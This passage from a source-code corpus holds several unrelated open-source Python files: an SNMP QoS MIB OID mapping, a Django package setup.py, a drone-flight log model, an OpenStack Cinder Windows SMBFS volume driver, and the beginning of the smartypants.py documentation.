'1.3.6.1.2.1.127.1.5.1.1': DOCS_IETF_QOS_MIB.docsIetfQosSID,
'1.3.6.1.2.1.127.1.5.1.2': DOCS_IETF_QOS_MIB.docsIetfQosUpstreamFragments,
'1.3.6.1.2.1.127.1.5.1.3': DOCS_IETF_QOS_MIB.docsIetfQosUpstreamFragDiscards,
'1.3.6.1.2.1.127.1.5.1.4': DOCS_IETF_QOS_MIB.docsIetfQosUpstreamConcatBursts,
'1.3.6.1.2.1.127.1.6.1.1': DOCS_IETF_QOS_MIB.docsIetfQosIfDirection,
'1.3.6.1.2.1.127.1.6.1.2': DOCS_IETF_QOS_MIB.docsIetfQosDSAReqs,
'1.3.6.1.2.1.127.1.6.1.3': DOCS_IETF_QOS_MIB.docsIetfQosDSARsps,
'1.3.6.1.2.1.127.1.6.1.4': DOCS_IETF_QOS_MIB.docsIetfQosDSAAcks,
'1.3.6.1.2.1.127.1.6.1.5': DOCS_IETF_QOS_MIB.docsIetfQosDSCReqs,
'1.3.6.1.2.1.127.1.6.1.6': DOCS_IETF_QOS_MIB.docsIetfQosDSCRsps,
'1.3.6.1.2.1.127.1.6.1.7': DOCS_IETF_QOS_MIB.docsIetfQosDSCAcks,
'1.3.6.1.2.1.127.1.6.1.8': DOCS_IETF_QOS_MIB.docsIetfQosDSDReqs,
'1.3.6.1.2.1.127.1.6.1.9': DOCS_IETF_QOS_MIB.docsIetfQosDSDRsps,
'1.3.6.1.2.1.127.1.6.1.10': DOCS_IETF_QOS_MIB.docsIetfQosDynamicAdds,
'1.3.6.1.2.1.127.1.6.1.11': DOCS_IETF_QOS_MIB.docsIetfQosDynamicAddFails,
'1.3.6.1.2.1.127.1.6.1.12': DOCS_IETF_QOS_MIB.docsIetfQosDynamicChanges,
'1.3.6.1.2.1.127.1.6.1.13': DOCS_IETF_QOS_MIB.docsIetfQosDynamicChangeFails,
'1.3.6.1.2.1.127.1.6.1.14': DOCS_IETF_QOS_MIB.docsIetfQosDynamicDeletes,
'1.3.6.1.2.1.127.1.6.1.15': DOCS_IETF_QOS_MIB.docsIetfQosDynamicDeleteFails,
'1.3.6.1.2.1.127.1.6.1.16': DOCS_IETF_QOS_MIB.docsIetfQosDCCReqs,
'1.3.6.1.2.1.127.1.6.1.17': DOCS_IETF_QOS_MIB.docsIetfQosDCCRsps,
'1.3.6.1.2.1.127.1.6.1.18': DOCS_IETF_QOS_MIB.docsIetfQosDCCAcks,
'1.3.6.1.2.1.127.1.6.1.19': DOCS_IETF_QOS_MIB.docsIetfQosDCCs,
'1.3.6.1.2.1.127.1.6.1.20': DOCS_IETF_QOS_MIB.docsIetfQosDCCFails,
'1.3.6.1.2.1.127.1.7.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogIndex,
'1.3.6.1.2.1.127.1.7.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogIfIndex,
'1.3.6.1.2.1.127.1.7.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogSFID,
'1.3.6.1.2.1.127.1.7.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogCmMac,
'1.3.6.1.2.1.127.1.7.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPkts,
'1.3.6.1.2.1.127.1.7.1.6': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogOctets,
'1.3.6.1.2.1.127.1.7.1.7': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogTimeDeleted,
'1.3.6.1.2.1.127.1.7.1.8': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogTimeCreated,
'1.3.6.1.2.1.127.1.7.1.9': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogTimeActive,
'1.3.6.1.2.1.127.1.7.1.10': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogDirection,
'1.3.6.1.2.1.127.1.7.1.11': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPrimary,
'1.3.6.1.2.1.127.1.7.1.12': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogServiceClassName,
'1.3.6.1.2.1.127.1.7.1.13': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPolicedDropPkts,
'1.3.6.1.2.1.127.1.7.1.14': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPolicedDelayPkts,
'1.3.6.1.2.1.127.1.7.1.15': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogControl,
'1.3.6.1.2.1.127.1.8.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassName,
'1.3.6.1.2.1.127.1.8.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassStatus,
'1.3.6.1.2.1.127.1.8.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPriority,
'1.3.6.1.2.1.127.1.8.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxTrafficRate,
'1.3.6.1.2.1.127.1.8.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxTrafficBurst,
'1.3.6.1.2.1.127.1.8.1.6': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMinReservedRate,
'1.3.6.1.2.1.127.1.8.1.7': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMinReservedPkt,
'1.3.6.1.2.1.127.1.8.1.8': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxConcatBurst,
'1.3.6.1.2.1.127.1.8.1.9': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassNomPollInterval,
'1.3.6.1.2.1.127.1.8.1.10': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTolPollJitter,
'1.3.6.1.2.1.127.1.8.1.11': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassUnsolicitGrantSize,
'1.3.6.1.2.1.127.1.8.1.12': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassNomGrantInterval,
'1.3.6.1.2.1.127.1.8.1.13': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTolGrantJitter,
'1.3.6.1.2.1.127.1.8.1.14': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassGrantsPerInterval,
'1.3.6.1.2.1.127.1.8.1.15': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxLatency,
'1.3.6.1.2.1.127.1.8.1.16': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassActiveTimeout,
'1.3.6.1.2.1.127.1.8.1.17': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassAdmittedTimeout,
'1.3.6.1.2.1.127.1.8.1.18': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassSchedulingType,
'1.3.6.1.2.1.127.1.8.1.19': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassRequestPolicy,
'1.3.6.1.2.1.127.1.8.1.20': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTosAndMask,
'1.3.6.1.2.1.127.1.8.1.21': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTosOrMask,
'1.3.6.1.2.1.127.1.8.1.22': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassDirection,
'1.3.6.1.2.1.127.1.8.1.23': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassStorageType,
'1.3.6.1.2.1.127.1.8.1.24': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassDSCPOverwrite,
'1.3.6.1.2.1.127.1.9.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyIndex,
'1.3.6.1.2.1.127.1.9.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyName,
'1.3.6.1.2.1.127.1.9.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyRulePriority,
'1.3.6.1.2.1.127.1.9.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyStatus,
'1.3.6.1.2.1.127.1.9.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyStorageType,
'1.3.6.1.2.1.127.1.10.1.1': DOCS_IETF_QOS_MIB.docsIetfQosPHSField,
'1.3.6.1.2.1.127.1.10.1.2': DOCS_IETF_QOS_MIB.docsIetfQosPHSMask,
'1.3.6.1.2.1.127.1.10.1.3': DOCS_IETF_QOS_MIB.docsIetfQosPHSSize,
'1.3.6.1.2.1.127.1.10.1.4': DOCS_IETF_QOS_MIB.docsIetfQosPHSVerify,
'1.3.6.1.2.1.127.1.10.1.5': DOCS_IETF_QOS_MIB.docsIetfQosPHSIndex,
'1.3.6.1.2.1.127.1.11.1.1': DOCS_IETF_QOS_MIB.docsIetfQosCmtsCmMac,
'1.3.6.1.2.1.127.1.11.1.2': DOCS_IETF_QOS_MIB.docsIetfQosCmtsServiceFlowId,
'1.3.6.1.2.1.127.1.11.1.3': DOCS_IETF_QOS_MIB.docsIetfQosCmtsIfIndex,
'1.3.6.1.2.1.127.2.1.1': DOCS_IETF_QOS_MIB.docsIetfQosBaseGroup,
'1.3.6.1.2.1.127.2.1.2': DOCS_IETF_QOS_MIB.docsIetfQosParamSetGroup,
'1.3.6.1.2.1.127.2.1.3': DOCS_IETF_QOS_MIB.docsIetfQosCmtsGroup,
'1.3.6.1.2.1.127.2.1.4': DOCS_IETF_QOS_MIB.docsIetfQosSrvClassPolicyGroup,
'1.3.6.1.2.1.127.2.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassGroup,
}
| lgpl-2.1 | -1,082,230,034,744,591,600 | 72.603896 | 88 | 0.739832 | false |
CIGIHub/django-ga-puller | setup.py | 1 | 1369 | from setuptools import setup # Always prefer setuptools over distutils
import os
README = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-ga-puller',
version='0.1.6',
packages=['ga_puller', 'ga_puller.management', 'ga_puller.management.commands'],
include_package_data=True,
license='MIT License',
description='Django app used to pull daily Google Analytics data into your django database.',
long_description=README,
url='https://github.com/CIGIHub/django-ga-puller/',
author='Caroline Simpson',
author_email='[email protected]',
install_requires=[
'google-api-python-client >= 1.2',
'pycrypto >= 2.6.1',
],
setup_requires=[
'google-api-python-client >= 1.2',
'pycrypto >= 2.6.1',
],
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| mit | -3,372,976,600,499,143,700 | 34.102564 | 97 | 0.626004 | false |
ftalex/buffelgrass_mapper | BuffelWeb/Model.py | 1 | 1562 | """
Classes for use with genshi; these are the basic data structures that are used
to create and populate the values of the templates.
"""
__author__ = "Alex Warren"
__copyright__ = "Copyright 2015, Autonomous Mapping Project"
__credits__ = ["Alex Warren", "Rachel Powers", "Thomas Schuker",
"Travis Kibler", "Jesse Odle", "Jeremy Hibbs"]
__license__ = "BSD 2"
import os
from BuffelMapper.Settings import settings
from droneapi.lib import VehicleMode, Vehicle
class Photograph(object):
def __init__(self, file_path, date_time):
self.file_path = file_path
self.date_time = date_time
def __repr__(self):
return '<%s %r>' % (type(self).__name__, self.date_time)
class Flight(object):
def __init__(self, path, date, flight_title, idx):
self.path = path
self.date = date
self.flight_title = flight_title
self.name = "%s_%s" %(date, flight_title)
self.idx = idx
def __str__(self):
return self.flight_title
class Flights(object):
def __init__(self):
self.flights = []
log_dir = settings["log_dir"]
self.log_dir = log_dir
all_date_dirs = [d for d in os.listdir(log_dir) if os.path.isdir(os.path.join(log_dir, d))]
for date_dir in os.listdir(log_dir):
full_date_dir = os.path.join(log_dir, date_dir)
if not os.path.isdir(full_date_dir):
continue
for flight_dir in os.listdir(full_date_dir):
full_flight_dir = os.path.join(full_date_dir, flight_dir)
if not os.path.isdir(full_flight_dir):
continue
self.flights.append(Flight(full_flight_dir, date_dir, flight_dir, len(self.flights)))
| bsd-2-clause | -7,928,987,849,017,785,000 | 28.471698 | 93 | 0.669014 | false |
hguemar/cinder | cinder/volume/drivers/windows/smbfs.py | 1 | 10774 | # Copyright (c) 2014 Cloudbase Solutions SRL
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import sys
from oslo.utils import units
from oslo_config import cfg
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder.openstack.common import fileutils
from cinder.openstack.common import log as logging
from cinder import utils
from cinder.volume.drivers import smbfs
from cinder.volume.drivers.windows import remotefs
from cinder.volume.drivers.windows import vhdutils
VERSION = '1.0.0'
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.set_default('smbfs_shares_config', r'C:\OpenStack\smbfs_shares.txt')
CONF.set_default('smbfs_mount_point_base', r'C:\OpenStack\_mnt')
CONF.set_default('smbfs_default_volume_format', 'vhd')
class WindowsSmbfsDriver(smbfs.SmbfsDriver):
VERSION = VERSION
def __init__(self, *args, **kwargs):
super(WindowsSmbfsDriver, self).__init__(*args, **kwargs)
self.base = getattr(self.configuration,
'smbfs_mount_point_base',
CONF.smbfs_mount_point_base)
opts = getattr(self.configuration,
'smbfs_mount_options',
CONF.smbfs_mount_options)
self._remotefsclient = remotefs.WindowsRemoteFsClient(
'cifs', root_helper=None, smbfs_mount_point_base=self.base,
smbfs_mount_options=opts)
self.vhdutils = vhdutils.VHDUtils()
def do_setup(self, context):
self._check_os_platform()
super(WindowsSmbfsDriver, self).do_setup(context)
def _check_os_platform(self):
if sys.platform != 'win32':
_msg = _("This system platform (%s) is not supported. This "
"driver supports only Win32 platforms.") % sys.platform
raise exception.SmbfsException(_msg)
def _do_create_volume(self, volume):
volume_path = self.local_path(volume)
volume_format = self.get_volume_format(volume)
volume_size_bytes = volume['size'] * units.Gi
if os.path.exists(volume_path):
err_msg = _('File already exists at: %s') % volume_path
raise exception.InvalidVolume(err_msg)
if volume_format not in (self._DISK_FORMAT_VHD,
self._DISK_FORMAT_VHDX):
err_msg = _("Unsupported volume format: %s ") % volume_format
raise exception.InvalidVolume(err_msg)
self.vhdutils.create_dynamic_vhd(volume_path, volume_size_bytes)
def _ensure_share_mounted(self, smbfs_share):
mnt_options = {}
if self.shares.get(smbfs_share) is not None:
mnt_flags = self.shares[smbfs_share]
mnt_options = self.parse_options(mnt_flags)[1]
self._remotefsclient.mount(smbfs_share, mnt_options)
def _delete(self, path):
fileutils.delete_if_exists(path)
def _get_capacity_info(self, smbfs_share):
"""Calculate available space on the SMBFS share.
:param smbfs_share: example //172.18.194.100/var/smbfs
"""
total_size, total_available = self._remotefsclient.get_capacity_info(
smbfs_share)
total_allocated = self._get_total_allocated(smbfs_share)
return_value = [total_size, total_available, total_allocated]
LOG.info('Smb share %s Total size %s Total allocated %s'
% (smbfs_share, total_size, total_allocated))
return [float(x) for x in return_value]
def _get_total_allocated(self, smbfs_share):
elements = os.listdir(smbfs_share)
total_allocated = 0
for element in elements:
element_path = os.path.join(smbfs_share, element)
if not self._remotefsclient.is_symlink(element_path):
if "snapshot" in element:
continue
if re.search(r'\.vhdx?$', element):
total_allocated += self.vhdutils.get_vhd_size(
element_path)['VirtualSize']
continue
if os.path.isdir(element_path):
total_allocated += self._get_total_allocated(element_path)
continue
total_allocated += os.path.getsize(element_path)
return total_allocated
def _img_commit(self, snapshot_path):
self.vhdutils.merge_vhd(snapshot_path)
self._delete(snapshot_path)
def _rebase_img(self, image, backing_file, volume_format):
# Relative path names are not supported in this case.
image_dir = os.path.dirname(image)
backing_file_path = os.path.join(image_dir, backing_file)
self.vhdutils.reconnect_parent(image, backing_file_path)
def _qemu_img_info(self, path, volume_name=None):
# This code expects to deal only with relative filenames.
# As this method is needed by the upper class and qemu-img does
# not fully support vhdx images, for the moment we'll use Win32 API
# for retrieving image information.
parent_path = self.vhdutils.get_vhd_parent_path(path)
file_format = os.path.splitext(path)[1][1:].lower()
if parent_path:
backing_file_name = os.path.split(parent_path)[1].lower()
else:
backing_file_name = None
class ImageInfo(object):
def __init__(self, image, backing_file):
self.image = image
self.backing_file = backing_file
self.file_format = file_format
return ImageInfo(os.path.basename(path),
backing_file_name)
def _do_create_snapshot(self, snapshot, backing_file, new_snap_path):
backing_file_full_path = os.path.join(
self._local_volume_dir(snapshot['volume']),
backing_file)
self.vhdutils.create_differencing_vhd(new_snap_path,
backing_file_full_path)
def _do_extend_volume(self, volume_path, size_gb):
self.vhdutils.resize_vhd(volume_path, size_gb * units.Gi)
@utils.synchronized('smbfs', external=False)
def copy_volume_to_image(self, context, volume, image_service, image_meta):
"""Copy the volume to the specified image."""
# If snapshots exist, flatten to a temporary image, and upload it
active_file = self.get_active_image_from_info(volume)
active_file_path = os.path.join(self._local_volume_dir(volume),
active_file)
backing_file = self.vhdutils.get_vhd_parent_path(active_file_path)
root_file_fmt = self.get_volume_format(volume)
temp_path = None
try:
if backing_file or root_file_fmt == self._DISK_FORMAT_VHDX:
temp_file_name = '%s.temp_image.%s.%s' % (
volume['id'],
image_meta['id'],
self._DISK_FORMAT_VHD)
temp_path = os.path.join(self._local_volume_dir(volume),
temp_file_name)
self.vhdutils.convert_vhd(active_file_path, temp_path)
upload_path = temp_path
else:
upload_path = active_file_path
image_utils.upload_volume(context,
image_service,
image_meta,
upload_path,
self._DISK_FORMAT_VHD)
finally:
if temp_path:
self._delete(temp_path)
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
volume_format = self.get_volume_format(volume, qemu_format=True)
image_meta = image_service.show(context, image_id)
fetch_format = volume_format
fetch_path = self.local_path(volume)
self._delete(fetch_path)
qemu_version = self.get_qemu_version()
needs_conversion = False
if (qemu_version < [1, 7] and (
volume_format == self._DISK_FORMAT_VHDX and
image_meta['disk_format'] != self._DISK_FORMAT_VHDX)):
needs_conversion = True
fetch_format = 'vpc'
temp_file_name = '%s.temp_image.%s.%s' % (
volume['id'],
image_meta['id'],
self._DISK_FORMAT_VHD)
fetch_path = os.path.join(self._local_volume_dir(volume),
temp_file_name)
image_utils.fetch_to_volume_format(
context, image_service, image_id,
fetch_path, fetch_format,
self.configuration.volume_dd_blocksize)
if needs_conversion:
self.vhdutils.convert_vhd(fetch_path, self.local_path(volume))
self._delete(fetch_path)
self.vhdutils.resize_vhd(self.local_path(volume),
volume['size'] * units.Gi)
def _copy_volume_from_snapshot(self, snapshot, volume, volume_size):
"""Copy data from snapshot to destination volume."""
LOG.debug("snapshot: %(snap)s, volume: %(vol)s, "
"volume_size: %(size)s" %
{'snap': snapshot['id'],
'vol': volume['id'],
'size': snapshot['volume_size']})
info_path = self._local_path_volume_info(snapshot['volume'])
snap_info = self._read_info_file(info_path)
vol_dir = self._local_volume_dir(snapshot['volume'])
forward_file = snap_info[snapshot['id']]
forward_path = os.path.join(vol_dir, forward_file)
# Find the file which backs this file, which represents the point
# when this snapshot was created.
img_info = self._qemu_img_info(forward_path)
snapshot_path = os.path.join(vol_dir, img_info.backing_file)
volume_path = self.local_path(volume)
self._delete(volume_path)
self.vhdutils.convert_vhd(snapshot_path,
volume_path)
self.vhdutils.resize_vhd(volume_path, volume_size * units.Gi)
| apache-2.0 | 1,899,625,683,295,123,000 | 39.201493 | 79 | 0.591981 | false |
hellobond/python-smartypants | lib/smartypants.py | 1 | 34216 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""
==============
smartypants.py
==============
----------------------------
SmartyPants ported to Python
----------------------------
Ported by `Chad Miller`_
Copyright (c) 2004, 2007 Chad Miller
original `SmartyPants`_ by `John Gruber`_
Copyright (c) 2003 John Gruber
Synopsis
========
A smart-quotes plugin for Pyblosxom_.
The original "SmartyPants" is a free web publishing plug-in for Movable Type,
Blosxom, and BBEdit that easily translates plain ASCII punctuation characters
into "smart" typographic punctuation HTML entities.
This software, *smartypants.py*, endeavours to be a functional port of
SmartyPants to Python, for use with Pyblosxom_.
Description
===========
SmartyPants can perform the following transformations:
- Straight quotes ( " and ' ) into "curly" quote HTML entities
- Backticks-style quotes (\`\`like this'') into "curly" quote HTML entities
- Dashes (``--`` and ``---``) into en- and em-dash entities
- Three consecutive dots (``...`` or ``. . .``) into an ellipsis entity
This means you can write, edit, and save your posts using plain old
ASCII straight quotes, plain dashes, and plain dots, but your published
posts (and final HTML output) will appear with smart quotes, em-dashes,
and proper ellipses.
SmartyPants does not modify characters within ``<pre>``, ``<code>``, ``<tt>``,
``<kbd>``, ``<math>`` or ``<script>`` tag blocks. Typically, these tags are
used to display text where smart quotes and other "smart punctuation" would
not be appropriate, such as source code or example markup.
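As an illustrative example (not taken from the original documentation): with
the "1" attribute described below, the plain ASCII input
``"SmartyPants" can't handle this -- or can it?`` comes out with curly double
quotes around "SmartyPants", a curly apostrophe in "can't", and an em-dash in
place of the "--".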
Backslash Escapes
=================
By default, escapes are not processed. To process escapes, the
`process_escapes=True` keyword argument must be passed. See below for a
description of what this does.
If you need to use literal straight quotes (or plain hyphens and
periods), SmartyPants accepts the following backslash escape sequences
to force non-smart punctuation. It does so by transforming the escape
sequence into a decimal-encoded HTML entity:
(FIXME: table here.)
.. comment It sucks that there's a disconnect between the visual layout and table markup when special characters are involved.
.. comment ====== ===== =========
.. comment Escape Value Character
.. comment ====== ===== =========
.. comment \\\\\\\\ &#92; \\\\
.. comment \\\\" &#34; "
.. comment \\\\' &#39; '
.. comment \\\\. &#46; .
.. comment \\\\- &#45; \-
.. comment \\\\` &#96; \`
.. comment ====== ===== =========
This is useful, for example, when you want to use straight quotes as
foot and inch marks: 6'2" tall; a 17" iMac.
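As a further (hypothetical) illustration: when ``process_escapes=True`` is
passed, writing ``6\'2\" tall`` keeps the foot and inch marks straight (they
are emitted as decimal-encoded entities), whereas the unescaped ``6'2"`` may
have its quotes curled.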
Options
=======
For Pyblosxom users, the ``smartypants_attributes`` attribute is where you
specify configuration options.
Numeric values are the easiest way to configure SmartyPants' behavior:
"0"
Suppress all transformations. (Do nothing.)
"1"
Performs default SmartyPants transformations: quotes (including
\`\`backticks'' -style), em-dashes, and ellipses. "``--``" (dash dash)
is used to signify an em-dash; there is no support for en-dashes.
"2"
Same as smarty_pants="1", except that it uses the old-school typewriter
shorthand for dashes: "``--``" (dash dash) for en-dashes, "``---``"
(dash dash dash)
for em-dashes.
"3"
Same as smarty_pants="2", but inverts the shorthand for dashes:
"``--``" (dash dash) for em-dashes, and "``---``" (dash dash dash) for
en-dashes.
"-1"
Stupefy mode. Reverses the SmartyPants transformation process, turning
the HTML entities produced by SmartyPants into their ASCII equivalents.
    E.g. "&#8220;" is turned into a simple double-quote ("), "&#8212;" is
turned into two dashes, etc.
Additionally, shorthands that are specific to Bond can be used to configure
the behavior of SmartyPants:
"B1"
Performs the following transformations: single (``'``) and double (``"``)
quotes. There is not support for bacticks, dashes (en- and em-), or
ellipses.
The following single-character attribute values can be combined to toggle
individual transformations from within the smarty_pants attribute. For
example, to educate normal quotes and em-dashes, but not ellipses or
\`\`backticks'' -style quotes:
``py['smartypants_attributes'] = "qd"``
"q"
Educates normal quote characters: (") and (').
"b"
Educates \`\`backticks'' -style double quotes.
"B"
Educates \`\`backticks'' -style double quotes and \`single' quotes.
"d"
Educates em-dashes.
"D"
Educates em-dashes and en-dashes, using old-school typewriter shorthand:
(dash dash) for en-dashes, (dash dash dash) for em-dashes.
"i"
Educates em-dashes and en-dashes, using inverted old-school typewriter
shorthand: (dash dash) for em-dashes, (dash dash dash) for en-dashes.
"e"
Educates ellipses.
"w"
    Translates any instance of ``&quot;`` into a normal double-quote character.
This should be of no interest to most people, but of particular interest
to anyone who writes their posts using Dreamweaver, as Dreamweaver
inexplicably uses this entity to represent a literal double-quote
character. SmartyPants only educates normal quotes, not entities (because
ordinarily, entities are used for the explicit purpose of representing the
specific character they represent). The "w" option must be used in
conjunction with one (or both) of the other quote options ("q" or "b").
Thus, if you wish to apply all SmartyPants transformations (quotes, en-
    and em-dashes, and ellipses) and also translate ``&quot;`` entities into
regular quotes so SmartyPants can educate them, you should pass the
following to the smarty_pants attribute:
The ``smartypants_forbidden_flavours`` list contains pyblosxom flavours for
which no Smarty Pants rendering will occur.
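As an illustrative, non-canonical configuration built from the flags above:
``py['smartypants_attributes'] = "qe"`` educates quotes and ellipses only,
and ``py['smartypants_forbidden_flavours'] = ["rss"]`` (the default) skips
SmartyPants rendering for the "rss" flavour.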
Caveats
=======
Why You Might Not Want to Use Smart Quotes in Your Weblog
---------------------------------------------------------
For one thing, you might not care.
Most normal, mentally stable individuals do not take notice of proper
typographic punctuation. Many design and typography nerds, however, break
out in a nasty rash when they encounter, say, a restaurant sign that uses
a straight apostrophe to spell "Joe's".
If you're the sort of person who just doesn't care, you might well want to
continue not caring. Using straight quotes -- and sticking to the 7-bit
ASCII character set in general -- is certainly a simpler way to live.
Even if you *do* care about accurate typography, you still might want to
think twice before educating the quote characters in your weblog. One side
effect of publishing curly quote HTML entities is that it makes your
weblog a bit harder for others to quote from using copy-and-paste. What
happens is that when someone copies text from your blog, the copied text
contains the 8-bit curly quote characters (as well as the 8-bit characters
for em-dashes and ellipses, if you use these options). These characters
are not standard across different text encoding methods, which is why they
need to be encoded as HTML entities.
People copying text from your weblog, however, may not notice that you're
using curly quotes, and they'll go ahead and paste the unencoded 8-bit
characters copied from their browser into an email message or their own
weblog. When pasted as raw "smart quotes", these characters are likely to
get mangled beyond recognition.
That said, my own opinion is that any decent text editor or email client
makes it easy to stupefy smart quote characters into their 7-bit
equivalents, and I don't consider it my problem if you're using an
indecent text editor or email client.
Algorithmic Shortcomings
------------------------
One situation in which quotes will get curled the wrong way is when
apostrophes are used at the start of leading contractions. For example:
``'Twas the night before Christmas.``
In the case above, SmartyPants will turn the apostrophe into an opening
single-quote, when in fact it should be a closing one. I don't think
this problem can be solved in the general case -- every word processor
I've tried gets this wrong as well. In such cases, it's best to use the
proper HTML entity for closing single-quotes (``&#8217;``) by hand.
Bugs
====
To file bug reports or feature requests (other than topics listed in the
Caveats section above) please send email to: mailto:[email protected]
If the bug involves quotes being curled the wrong way, please send example
text to illustrate.
To Do list
----------
- Provide a function for use within templates to quote anything at all.
Version History
===============
1.5_2.1: Fri, 24 Oct 2014, 18:53:25 -0400
- Added option to process escapes. By default backslash escapes will
not be processed.
1.5_2.0: Thu, 04 Sep 2014 12:31:22 -0400
- Added unicode output option and added new attributes (Bond usage cases).
Note that version number jumps to reflect fork implementations.
1.5_1.6: Fri, 27 Jul 2007 07:06:40 -0400
- Fixed bug where blocks of precious unalterable text was instead
interpreted. Thanks to Le Roux and Dirk van Oosterbosch.
1.5_1.5: Sat, 13 Aug 2005 15:50:24 -0400
- Fix bogus magical quotation when there is no hint that the
user wants it, e.g., in "21st century". Thanks to Nathan Hamblen.
- Be smarter about quotes before terminating numbers in an en-dash'ed
range.
1.5_1.4: Thu, 10 Feb 2005 20:24:36 -0500
- Fix a date-processing bug, as reported by jacob childress.
- Begin a test-suite for ensuring correct output.
- Removed import of "string", since I didn't really need it.
(This was my first every Python program. Sue me!)
1.5_1.3: Wed, 15 Sep 2004 18:25:58 -0400
- Abort processing if the flavour is in forbidden-list. Default of
[ "rss" ] (Idea of Wolfgang SCHNERRING.)
- Remove stray virgules from en-dashes. Patch by Wolfgang SCHNERRING.
1.5_1.2: Mon, 24 May 2004 08:14:54 -0400
- Some single quotes weren't replaced properly. Diff-tesuji played
by Benjamin GEIGER.
1.5_1.1: Sun, 14 Mar 2004 14:38:28 -0500
- Support upcoming pyblosxom 0.9 plugin verification feature.
1.5_1.0: Tue, 09 Mar 2004 08:08:35 -0500
- Initial release
Version Information
-------------------
Version numbers will track the SmartyPants_ version numbers, with the addition
of an underscore and the smartypants.py version on the end.
New versions will be available at `http://wiki.chad.org/SmartyPantsPy`_
.. _http://wiki.chad.org/SmartyPantsPy: http://wiki.chad.org/SmartyPantsPy
Authors
=======
`John Gruber`_ did all of the hard work of writing this software in Perl for
`Movable Type`_ and almost all of this useful documentation. `Chad Miller`_
ported it to Python to use with Pyblosxom_.
Additional Credits
==================
Portions of the SmartyPants original work are based on Brad Choate's nifty
MTRegex plug-in. `Brad Choate`_ also contributed a few bits of source code to
this plug-in. Brad Choate is a fine hacker indeed.
`Jeremy Hedley`_ and `Charles Wiltgen`_ deserve mention for exemplary beta
testing of the original SmartyPants.
`Rael Dornfest`_ ported SmartyPants to Blosxom.
.. _Brad Choate: http://bradchoate.com/
.. _Jeremy Hedley: http://antipixel.com/
.. _Charles Wiltgen: http://playbacktime.com/
.. _Rael Dornfest: http://raelity.org/
Copyright and License
=====================
SmartyPants_ license::
Copyright (c) 2003 John Gruber
(http://daringfireball.net/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name "SmartyPants" nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
